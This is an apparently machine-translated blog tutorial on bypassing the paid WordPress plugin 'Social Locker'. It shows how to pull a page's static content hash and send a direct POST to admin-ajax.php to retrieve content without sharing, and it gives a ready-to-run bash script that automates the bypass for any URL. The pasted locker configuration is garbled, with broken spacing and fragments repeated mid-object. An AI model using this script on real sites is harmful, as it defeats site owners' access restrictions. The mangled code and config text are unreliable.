JavaScript attacks on the example of bypassing Social Locker for WordPress

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JavaScript attacks on the example of bypassing Social Locker for WordPress, image # 1

The article "Attacks on JavaScript" shows examples of bypassing restrictions imposed by JavaScript. It is clear that there is a tutorial example, so it is rather pointless. Let's take a more realistic situation. In the article "Bypass HTML source blocking, bypass social blockers and other countermeasures to collect information about the site" I showed how easy it is to bypass social blockers, since hidden links and text are loaded on the page, but styles are used to make this block invisible ... I even made a small service that will show you everything that social blockers hide. It's so easy you don't even have to fight JavaScript.

But they sent me an example site (_https: // that uses a more cunning social blocker.

Looking ahead, this is a paid plugin called "Social Locker for WordPress" and costs $ 27:

JavaScript attacks on the example of bypassing Social Locker for WordPress, image # 2

Moreover, this is not an abandoned plugin, at the time of writing, the last update was made on May 8, 2020.

Let's start by parsing HTML and JavaScript code.

As you can see, in the source code the name is BizPanda Lockers, the path to this file is / sociallocker-next-premium / bizpanda, I googled and found the page of this very Social Locker for WordPress.

JavaScript attacks on the example of bypassing Social Locker for WordPress, image # 3

Analysis of the source code of the page showed that the content of the hidden block is missing in it, although there is some interesting data:
if (! window.bizpanda) window.bizpanda = {};
if (! window.bizpanda.lockerOptions) window.bizpanda.lockerOptions = {};
window.bizpanda.lockerOptions ['onpLock951887'] = {"lockerId": "3169", "tracking": "0", "postId": 17162, "ajaxUrl": "https: \ / \ /
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\ / wp-admin \ /admin-ajax.php "," options ": {" demo ": 1," actualUrls ": 0," text ": {" header ":" Link Download Tanpa Iklan "," message " : "
Klik salah satu tombol dibawah ini untuk download tanpa iklan. <\ / P> "}," theme ":" great-attractor "," lang ":" en_US "," agreement ": {" note ": 0," termsUrl ": false ," privacyPolicyUrl ": false, "showInPopup": {"width": 570, "height": 400}}, "overlap": {"mode": "full", "position": "middle", "altMode": "full"}, "highlight": 0, "googleAnalytics": 0, "locker": {"counter": 1, "loadingTimeout": "20000", "tumbler": 0, "naMode": "show-error", "inAppBrowsers" : "visible_with_warning", "inAppBrowsersWarning": "You are viewing this page in the {browser}. The locker may work incorrectly in this browser. Please open this page in a standard browser.", "close": 0, "mobile" : 1, "expires": 0}, "proxy": "https: \ / \ /
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\ / wp-admin \ /admin-ajax.php? Action = opanda_connect", "groups": ["social-buttons "]," socialButtons ": {" counters ": 1," order ": [" facebook-share "," twitter-tweet "]," behaviorOnError ":" show_error "," behaviorError ":" Matikan Adblock Untuk Download Tanpa Iklan "," facebook ": {" appId ":" 331196770812733 "," lang ":" en_US "," version ":" v6.0 "," like ": {" url ":" https: \ / \ /
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\ / yasir252 "," title ":" Like "," theConfirmIssue ": 0}," share ": {" url ":" https: \ / \ /
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\ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / "," title ":" Share "," shareDialog ":facebook-share "," twitter-tweet "]," behaviorOnError ":" show_error "," behaviorError ":" Matikan Adblock Untuk Download Tanpa Iklan "," facebook ": {" appId ":" 331196770812733 "," lang ": "en_US", "version": "v6.0", "like": {"url": "https: \ / \ /
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\ / yasir252", "title": "Like", "theConfirmIssue ": 0}," share ": {" url ":" https: \ / \ /
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\ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / ", "title": "Share", "shareDialog":facebook-share "," twitter-tweet "]," behaviorOnError ":" show_error "," behaviorError ":" Matikan Adblock Untuk Download Tanpa Iklan "," facebook ": {" appId ":" 331196770812733 "," lang ": "en_US", "version": "v6.0", "like": {"url": "https: \ / \ /
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\ / yasir252", "title": "Like", "theConfirmIssue ": 0}," share ": {" url ":" https: \ / \ /
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\ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / ", "title": "Share", "shareDialog":facebook ": {" appId ":" 331196770812733 "," lang ":" en_US "," version ":" v6.0 "," like ": {" url ":" https: \ / \ /
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. com \ / yasir252 "," title ":" Like "," theConfirmIssue ": 0}," share ": {" url ":" https: \ / \ /
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\ / software \ / download-adobe -photoshop-cc-2020-full-version-windows \ / "," title ":" Share "," shareDialog ":facebook ": {" appId ":" 331196770812733 "," lang ":" en_US "," version ":" v6.0 "," like ": {" url ":" https: \ / \ /
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. com \ / yasir252 "," title ":" Like "," theConfirmIssue ": 0}," share ": {" url ":" https: \ / \ /
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\ / software \ / download-adobe -photoshop-cc-2020-full-version-windows \ / "," title ":" Share "," shareDialog ":com \ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / "," title ":" Share "," shareDialog ":com \ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / "," title ":" Share "," shareDialog ":true }}, "twitter": {"lang": "en", "tweet": {"url": "https: \ / \ /
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\ / software \ / download-adobe-photoshop-cc -2020-full-version-windows \ / "," doubleCheck ": 1," title ":" Tweet "}," follow ": {" url ":" https: \ / \ / \ / yasir252com " , "title": "Follow us", "doubleCheck": 1, "hideScreenName": 1}}, "google": {"lang": "en", "plus": {"url": "https: \ /\/\/software\/download-adobe-photoshop-cc-2020-full-version-windows\/","title":"+1 us "}," share ": {" url ":" https: \ / \ /
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\ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / "," title ":"Share "}}," youtube ": {" subscribe ": {" channelId ":" UCvPfXFZzw3x4I1FBYVlXbsg "," title ":" Youtube "}}," linkedin ": {" share ": {" url ":" https: \ / \ /
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\ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / "," title ":" share "}}}," lazy ": true}, "_ theme": "great-attractor", "_ style": null , "ajax": true , "contentHash": "e408051e78dd01cade57a25100ad70c7", "stats": false };
Analysis of the JavaScript script file (_https: // gave this interesting snippet:

// loading the locked content via ajax

if (data.ajax) {

options.content = {
url: data.ajaxUrl,
type: 'POST',
data: {
lockerId: data.lockerId,
action: 'opanda_loader',
hash: data.contentHash
Pay attention to the comment - "loading blocked content via ajax".

The ajaxUrl, lockerId and contentHash values can be found in the previous code snippet.

In fact, I found the second snippet after figuring out how to bypass this social blocker. You could skip the analysis of the source code altogether and immediately start by analyzing the POST request (see "How to Analyze POST Requests in a Web Browser").

I "liked" the article to view the hidden text:
JavaScript attacks on the example of bypassing Social Locker for WordPress, image # 4

As you can see, a POST request is sent to the page
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containing the string "lockerId = 3169 & action = opanda_loader & hash = e408051e78dd01cade57a25100ad70c7":
JavaScript attacks on the example of bypassing Social Locker for WordPress, image # 5

And in response comes a code hidden by a social blocker:
JavaScript attacks on the example of bypassing Social Locker for WordPress, image # 6

Rendering the received data:
JavaScript attacks on the example of bypassing Social Locker for WordPress, image # 7

Trying to get hidden text bypassing sharing on social networks:
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-d 'lockerId = 3169 & action = opanda_loader & hash = e408051e78dd01cade57a25100ad70c7'
Everything worked!

JavaScript attacks on the example of bypassing Social Locker for WordPress, image # 8

If you do not understand the HTML text, then save it to a file and open it in a web browser:
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-d 'lockerId = 3169 & action = opanda_loader & hash = e408051e78dd01cade57a25100ad70c7'> locker.htm && firefox locker.htm

Further analysis showed that the hash is static and is always contained in the source code. The lockerId value does not change and any number can be substituted there (perhaps this is the result of a "crack").

In order not to crawl into the source code every time, we will create a script for automation. To the file:
Copy the following:
#! / bin / bash

if [[-z $ 1]]; then
echo 'No link provided to bypass social blocker!';
exit 1;

t0 = `curl -s -A 'Mozilla / 5.0 (X11; Linux x86_64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 72.0.3626.119 Safari / 537.36'" $ 1 "`

hash = "` echo "$ t0" | grep -E 'window.bizpanda.lockerOptions' | grep -E -o' "contentHash": "[A-Za-z0-9] {8,}" '| sed' s / "contentHash": "// '| sed 's / "//'` ";
t5 = $ hash

url = "` echo $ 1 | grep -E -o 'http (| s): // [^ /] +' `/ wp-admin / admin-ajax.php"

if [["$ t5"]]; then
curl $ url -d 'lockerId = 3169 & action = opanda_loader & hash =' $ hash
Run like this:
bash 'URL'
For example:
bash '
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To immediately see the content after rendering the HTML code, use the construction:
bash 'URL'> locker.htm && firefox locker.htm
For example:
bash '
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'> locker.htm && firefox locker.htm

I added support for this plugin to my service for bypassing social blockers:
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